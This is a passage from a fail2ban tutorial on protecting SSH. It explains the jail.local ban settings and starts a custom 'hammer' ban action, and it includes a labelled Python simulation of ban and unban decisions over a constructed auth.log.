  # jail.{conf,local} configuration files.
  destemail = root@localhost.com

Ok, so we have the local IP address allowed; multiple addresses can be entered and separated with a space.
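To see what ignoreip, bantime and maxretry actually do to a stream of sshd failures, here is an added example (not fail2ban's own code) that re-implements the jail decision logic in Python with the [DEFAULT] values above plus fail2ban's findtime window; the host name "proxy", the PIDs and the TEST-NET addresses in the sample log are constructed.

```python
# Minimal fail2ban-style SSH jail: an added example, not fail2ban's own code.
# It mirrors the [DEFAULT] knobs shown above (ignoreip, bantime, maxretry) plus
# fail2ban's findtime window, so ban/unban decisions can be traced over a few
# constructed auth.log lines. Host name, PIDs and TEST-NET addresses are made up.
import ipaddress
import re
from collections import defaultdict
from datetime import datetime, timedelta

# sshd's "Failed password" line as written to auth.log (syslog stamp, no year);
# successful logins and other noise deliberately do not match.
FAILED_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?\S+ from (?P<ip>[\d.]+) port \d+"
)

def parse_ts(stamp, year=2013):
    # syslog omits the year; assume one (constructed) so stamps are comparable
    return datetime.strptime(f"{year} {stamp}", "%Y %b %d %H:%M:%S")

class Jail:
    def __init__(self, ignoreip=("127.0.0.1/8",), maxretry=3,
                 findtime=600, bantime=18000):
        self.ignore = [ipaddress.ip_network(n, strict=False) for n in ignoreip]
        self.maxretry, self.findtime, self.bantime = maxretry, findtime, bantime
        self.failures = defaultdict(list)  # ip -> failure stamps in window
        self.bans = {}                     # ip -> datetime the ban expires
        self.actions = []                  # ("ban"|"unban", ip), in order

    def _ignored(self, ip):
        addr = ipaddress.ip_address(ip)
        return any(addr in net for net in self.ignore)

    def _expire(self, now):
        # bantime elapsed: real fail2ban runs actionunban (drops the iptables rule)
        for ip, until in list(self.bans.items()):
            if now >= until:
                del self.bans[ip]
                self.actions.append(("unban", ip))

    def feed(self, line):
        """Process one log line; return ("ban", ip) when a ban is triggered."""
        m = FAILED_RE.match(line)
        if not m:
            return None
        ip, ts = m.group("ip"), parse_ts(m.group("ts"))
        self._expire(ts)
        if self._ignored(ip) or ip in self.bans:
            return None  # whitelisted, or already dropped by the firewall
        # only failures inside the findtime window count towards maxretry
        window = [t for t in self.failures[ip]
                  if (ts - t).total_seconds() <= self.findtime]
        window.append(ts)
        self.failures[ip] = window
        if len(window) >= self.maxretry:
            self.bans[ip] = ts + timedelta(seconds=self.bantime)
            del self.failures[ip]
            self.actions.append(("ban", ip))
            return ("ban", ip)
        return None

SAMPLE_LOG = """\
Jun  3 10:00:01 proxy sshd[2001]: Failed password for root from 203.0.113.7 port 51000 ssh2
Jun  3 10:00:04 proxy sshd[2001]: Failed password for invalid user admin from 203.0.113.7 port 51001 ssh2
Jun  3 10:00:09 proxy sshd[2001]: Failed password for root from 203.0.113.7 port 51002 ssh2
Jun  3 10:00:11 proxy sshd[2001]: Failed password for root from 203.0.113.7 port 51003 ssh2
Jun  3 10:01:00 proxy sshd[2002]: Failed password for pi from 127.0.0.1 port 40000 ssh2
Jun  3 10:02:00 proxy sshd[2003]: Accepted publickey for pi from 198.51.100.5 port 42000 ssh2
Jun  3 10:30:00 proxy sshd[2004]: Failed password for pi from 198.51.100.5 port 42001 ssh2
Jun  3 10:45:00 proxy sshd[2005]: Failed password for pi from 198.51.100.5 port 42002 ssh2
Jun  3 10:50:00 proxy sshd[2006]: Failed password for pi from 198.51.100.5 port 42003 ssh2
Jun  3 15:00:10 proxy sshd[2007]: Failed password for root from 203.0.113.7 port 51004 ssh2
"""

def run_demo(**settings):
    # feed the constructed log through a Jail and hand it back for inspection
    jail = Jail(**settings)
    for line in SAMPLE_LOG.splitlines():
        jail.feed(line)
    return jail
```

With the defaults, 203.0.113.7 is banned on its third failure and released five hours later, the loopback failures are ignored, and 198.51.100.5 never reaches three failures inside one findtime window; run_demo(maxretry=1) shows the paranoid setting banning on the first failure.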
It's always good to have an IP that you can log in from just in case; after all, you won't want to set this one off once it's up and running. We have set the ban time to 5 hours; this is a tad on the long side I know, but I like to be sure, and 10 minutes may be more than enough. Maxretry speaks for itself, essentially how many retries you will allow the system to accept; 3 is generally the socially accepted standard, although if you are paranoid then you can set it to 1, or possibly a few more if you wanted to be certain it was a bot or whatnot. Leave backend on auto and enter your email into destemail to get a nice mail every time an IP address gets banned - assuming that you've set up a mail server. Now the next section we will look at in the /etc/fail2ban/jail.local file is this part:

  #
  # ACTIONS
  #

  # Default banning action (e.g. iptables, iptables-new,
  # iptables-multiport, shorewall, etc) It is used to define
  # action_* variables. Can be overridden globally or per
  # section within jail.local file
  banaction = iptables-multiport

  # email action. Since 0.8.1 upstream fail2ban uses sendmail
  # MTA for the mailing. Change mta configuration parameter to mail
  # if you want to revert to conventional 'mail'.
  mta = sendmail

  # Default protocol
  protocol = tcp

  [...]

Ok, this default entry shows us what action will be called once the offender has tried to brute force the server. The banaction = iptables-multiport is referring to the file /etc/fail2ban/action.d/iptables-multiport.conf. We will change this to:

  banaction = hammer

Now save it and we'll go make a few more changes to the set up. Let's make a copy of the action file and change a few things in there:

  cd /etc/fail2ban/action.d
  cp ./iptables-multiport.conf /etc/fail2ban/action.d/hammer.conf
  nano /etc/fail2ban/action.d/hammer.conf

Now look for this bit:

  # Option:  actionban
  # Notes.:  command executed when banning an IP. Take care that the
  #          command is executed with Fail2Ban user rights.
  # Tags:    IP address
  #          number of failures
  #